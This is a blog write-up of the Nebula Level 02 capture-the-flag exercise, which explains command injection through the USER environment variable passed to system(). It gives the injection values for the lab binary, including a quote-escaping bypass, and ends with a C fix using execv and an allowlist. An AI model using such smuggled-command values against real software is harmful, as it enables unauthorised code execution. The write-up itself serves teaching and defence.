blog.ferling.eu by Benedikt Ferling

exploit-exercises.com/nebula -- Level 02

Problem

  1. User input is fully trusted!
  2. Functions are used that are known to be vulnerable!

As in the previous level, the C function system(const char *command) is used, which is not safe. If user input is passed directly to this function, the user can execute arbitrary code.

Exploit

You just put the command to execute inside the USER variable. To be more elegant, and to avoid triggering an IDS that looks for crashing programs, one might:

  1. First terminate the echo,
  2. then execute getflag,
  3. and finally return to the original echo.
export USER='; getflag ; /bin/echo'
/home/flag02/flag02

Alternative syntax

Passing the variable USER directly to the process.

USER='; getflag ; /bin/echo' /home/flag02/flag02

Lesson / How to fix

  1. Do not trust input that the user controls!
    How can one handle user input? Safe handling of user input depends heavily on the features of the language one is using!
  2. Do not use functions that are known to be vulnerable!

In some languages it might be sufficient to surround the input with single quotes. Not in this case, however. If you change line 22 like this:

...
asprintf(&buffer, "/bin/echo '%s' is cool", getenv("USER"));
...

one can still execute arbitrary code with the following value of the environment variable USER:

USER="' ; ls ; echo '"

This small example should show that there is no magic formula for sanitizing user input or protecting code from it!
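As an added example (my own code, not from the original post or from the Nebula level's source), the fix I would reach for in C: skip the shell entirely and hand the USER value to /bin/echo as a single argv element via fork()+execv(), plus an allowlist check for the case where the value is supposed to be a login name. The function names are my own, and the sample inputs are the payloads quoted above.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Build the argv for /bin/echo. No shell tokenizes it, so the USER value
 * reaches echo as one literal word whatever ';' or quotes it contains. */
static int build_echo_argv(const char *user, const char *argv[4]) {
    argv[0] = "/bin/echo";
    argv[1] = user;
    argv[2] = "is cool";
    argv[3] = NULL;
    return 3;
}

/* Replacement for system(buffer): returns the child's exit status or -1. */
static int echo_without_shell(const char *user) {
    const char *argv[4];
    int status;
    build_echo_argv(user, argv);
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execv(argv[0], (char *const *)argv);
        _exit(127); /* only reached if execv failed */
    }
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Allowlist: a login name never needs ';' or quotes, so reject instead of escaping. */
static int is_plausible_username(const char *s) {
    if (s == NULL || *s == '\0' || strlen(s) > 32) return 0;
    for (; *s; s++) {
        int ok = (*s >= 'a' && *s <= 'z') || (*s >= '0' && *s <= '9') || *s == '_' || *s == '-';
        if (!ok) return 0;
    }
    return 1;
}

int main(void) {
    /* Constructed inputs: the two payloads from this level and a benign login name. */
    const char *inputs[] = { "; getflag ; /bin/echo", "' ; ls ; echo '", "flag02" };
    for (int i = 0; i < 3; i++)
        printf("allowlist=%d exit=%d USER=[%s]\n", is_plausible_username(inputs[i]),
               echo_without_shell(inputs[i]), inputs[i]);
    return 0;
}
```

Running it prints each payload back as a literal string followed by "is cool"; getflag and ls are never invoked because no shell parses the value.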
